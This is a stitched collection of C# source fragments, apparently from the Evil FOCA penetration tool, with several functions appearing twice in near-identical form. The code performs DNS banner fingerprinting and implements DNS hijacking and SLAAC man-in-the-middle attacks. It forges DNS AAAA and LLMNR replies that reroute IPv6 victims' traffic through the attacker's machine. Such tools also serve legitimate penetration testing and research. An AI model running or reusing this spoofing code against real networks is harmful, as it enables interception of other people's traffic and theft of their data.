public override void GetVersion()
{
try
{
System.Net.IPAddress[] ips = System.Net.Dns.GetHostAddresses(Host);
if (ips.Length == 0)
{
return;
}
// Hace la query como 'TXT'. Es mejor hacerla como 'ALL', pero no veo la opción en la lista de QTypes. ¿Quizas ANY?
Heijden.DNS.Resolver r = new Heijden.DNS.Resolver(ips[0], base.Port);
r.TimeOut = 1000;
Heijden.DNS.Response response = r.Query("version.bind", Heijden.DNS.QType.TXT, Heijden.DNS.QClass.CH);
if (response.RecordsTXT.Length > 0)
{
Version = response.RecordsTXT[0].TXT;
this.os = AnalyzeBanner(Version);
}
if (this.FingerPrintingFinished != null)
{
FingerPrintingFinished(this, null);
}
}
catch
{
if (FingerPrintingError != null)
{
FingerPrintingError(this, null);
}
}
}
public string GetDnsServer(string domain)
{
string Dns = string.Empty;
try
{
IPAddress DefaultDns = GetDefaultDns();
if (DefaultDns == null)
return string.Empty;
Dig dig = new Dig();
dig.resolver.TransportType = Heijden.DNS.TransportType.Tcp;
Heijden.DNS.Response Response = dig.resolver.Query(domain, Heijden.DNS.QType.NS, Heijden.DNS.QClass.IN);
if (Response != null)
{
if (Response.header.RCODE == Heijden.DNS.RCode.NoError)
{
if (Response.Answers.Count > 0)
Dns = Response.Answers[0].RECORD.ToString().TrimEnd('.');
if (Response.Authorities.Count > 0)
{
//Dns = Response.Authorities[0].RECORD.ToString().Substring(0, Response.Authorities[0].RECORD.ToString().LastIndexOf('.'));
Dns = Response.Authorities[0].RECORD.ToString().Substring(0, Response.Authorities[0].RECORD.ToString().IndexOf(' ')).TrimEnd('.');
}
}
}
}
catch (Exception)
{
Console.WriteLine("DNSServer konnte nicht gefunden werden.(DNSValidator/GetDNSServer)");
}
return Dns;
}
private bool ValidateDomain(string domain)
{
try
{
//IPAddress dnsServer = null;
//IPAddress[] dnsAddresses = Dns.GetHostAddresses(dNSServer);
//if (dnsAddresses.Length > 0)
// dnsServer = dnsAddresses[0];
Dig dig = new Dig();
dig.resolver.DnsServer = dNSServer;
dig.resolver.TimeOut = 500;
dig.resolver.TransportType = Heijden.DNS.TransportType.Tcp;
Heijden.DNS.Response Response = dig.resolver.Query(domain, Heijden.DNS.QType.A, Heijden.DNS.QClass.IN);
if (Response != null)
if (Response.header.RCODE == Heijden.DNS.RCode.NoError && Response.RecordsA.Length > 0)
return true;
}
catch (Exception)
{
Console.WriteLine("DNSServer konnte nicht bestätigt werden (DnsValidator/ValidateDomain) k");
}
return false;
}
public bool CheckIfHijack(Packet p)
{
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DNSHijacking && A.attackStatus == Data.AttackStatus.Attacking))
{
if ((p.PayloadPacket != null && p.PayloadPacket.PayloadPacket != null) && (p.PayloadPacket.PayloadPacket is UdpPacket))
{
EthernetPacket ethernet = (EthernetPacket)p;
IpPacket ip = (IpPacket)p.PayloadPacket;
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if ((udp.SourcePort == 53)) // La respuesta DNS
{
// Comprobamos que venga a nuestra MAC pero no a nuestra IP
if (NeedToRoute(ip))
{
try
{
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
DNSHijackAttack dnsAttack = (DNSHijackAttack)attack;
foreach (Heijden.DNS.Question q in response.Questions)
{
if ((q.QName == dnsAttack.domain + ".") || dnsAttack.domain == "*")
{
return(true);
}
}
}
catch
{
return(false);
}
}
else
{
return(false);
}
}
}
}
return(false);
}
public override void GetVersion()
{
try
{
System.Net.IPAddress[] ips = System.Net.Dns.GetHostAddresses(Host);
if (ips.Length == 0)
{
return;
}
Heijden.DNS.Resolver r = new Heijden.DNS.Resolver(ips[0], base.Port);
r.TimeOut = 10;
Heijden.DNS.Response response = r.Query("version.bind", Heijden.DNS.QType.TXT, Heijden.DNS.QClass.CH);
if (response.RecordsTXT.Length > 0)
{
OperatingSystem.OS os = OperatingSystem.OS.Unknown;
Version = response.RecordsTXT.SelectMany(p => p.TXT.Where(q => !String.IsNullOrEmpty(q)))
.FirstOrDefault(p =>
{
os = AnalyzeBanner(p);
return(os != OperatingSystem.OS.Unknown);
}
);
this.os = os;
}
if (this.FingerPrintingFinished != null)
{
FingerPrintingFinished(this, null);
}
}
catch
{
if (FingerPrintingError != null)
{
FingerPrintingError(this, null);
}
}
}
public bool CheckIfHijack(Packet p)
{
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DNSHijacking && A.attackStatus == Data.AttackStatus.Attacking))
{
if ((p.PayloadPacket != null && p.PayloadPacket.PayloadPacket != null) && (p.PayloadPacket.PayloadPacket is UdpPacket))
{
EthernetPacket ethernet = (EthernetPacket)p;
IpPacket ip = (IpPacket)p.PayloadPacket;
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if ((udp.SourcePort == 53)) // La respuesta DNS
{
// Comprobamos que venga a nuestra MAC pero no a nuestra IP
if (NeedToRoute(ip))
{
try
{
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
DNSHijackAttack dnsAttack = (DNSHijackAttack)attack;
foreach (Heijden.DNS.Question q in response.Questions)
{
if ((q.QName == dnsAttack.domain + ".") || dnsAttack.domain == "*")
return true;
}
}
catch
{
return false;
}
}
else
return false;
}
}
}
return false;
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A
&& (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00,0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0xff,0xff,
(byte)ips[0].GetAddressBytes()[0],(byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2] ,(byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}
private void DNSCheck(Packet p)
{
EthernetPacket ethernet = (EthernetPacket)p;
if (p.PayloadPacket.PayloadPacket is UdpPacket)
{
UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket;
attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack =>
{
MitmAttack mitmAttack = currentAttack as MitmAttack;
if (p.PayloadPacket is IPv6Packet)
{
switch (udp.DestinationPort)
{
case 53:
Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData);
var aaaaDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A
select q).ToList();
//Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A.
var aTeredoDns = (from q in response.Questions
where q.QType == Heijden.DNS.QType.A &&
(q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi"))
select q).ToList();
if (aaaaDns != null && aaaaDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
else if (aTeredoDns != null && aTeredoDns.Count > 0)
{
DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData);
string q = query.name;
IPAddress[] ips = Dns.GetHostAddresses(q);
DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]);
byte[] respByteAr = resp.GeneratePacket();
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = respByteAr;
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
case 5355:
LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket();
llmnr.ParsePacket(udp.PayloadData);
if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA)
{
IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name)
where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork
select ip).ToArray();
byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
(byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1],
(byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] };
llmnr.AnswerList.Add(new LLMNR.DNSAnswer()
{
Class = evilfoca.LLMNR.DNSClass.IN,
Name = llmnr.Query.Name,
Type = evilfoca.LLMNR.DNSType.AAAA,
RData = ipv6Addr,
RDLength = (short)ipv6Addr.Length
});
EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4);
IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress);
UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort);
udpDns.PayloadData = llmnr.BuildPacket();
ipv6Dns.PayloadPacket = udpDns;
ethDns.PayloadPacket = ipv6Dns;
udpDns.UpdateCalculatedValues();
udpDns.UpdateUDPChecksum();
ipv6Dns.UpdateCalculatedValues();
Program.CurrentProject.data.SendPacket(ethDns);
}
break;
default:
break;
}
}
});
}
}
